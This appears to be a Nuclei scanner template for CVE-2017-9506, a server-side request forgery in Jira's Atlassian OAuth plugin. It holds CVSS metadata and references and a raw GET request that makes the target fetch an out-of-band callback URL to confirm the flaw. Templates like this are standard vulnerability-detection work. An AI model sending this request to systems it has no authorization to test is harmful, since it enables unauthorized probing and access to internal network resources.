32 lines
1.1 KiB
YAML
32 lines
1.1 KiB
YAML
id: CVE-2017-9506
|
|
|
|
info:
|
|
name: Jira IconURIServlet SSRF
|
|
author: pdteam
|
|
severity: medium
|
|
description: The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network
|
|
resources and/or perform an XSS attack via Server Side Request Forgery (SSRF).
|
|
reference:
|
|
- http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html
|
|
- https://ecosystem.atlassian.net/browse/OAUTH-344
|
|
- https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2017-9506
|
|
cwe-id: CWE-918
|
|
tags: cve,cve2017,atlassian,jira,ssrf,oast
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Origin: {{BaseURL}}
|
|
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
|
words:
|
|
- "http"
|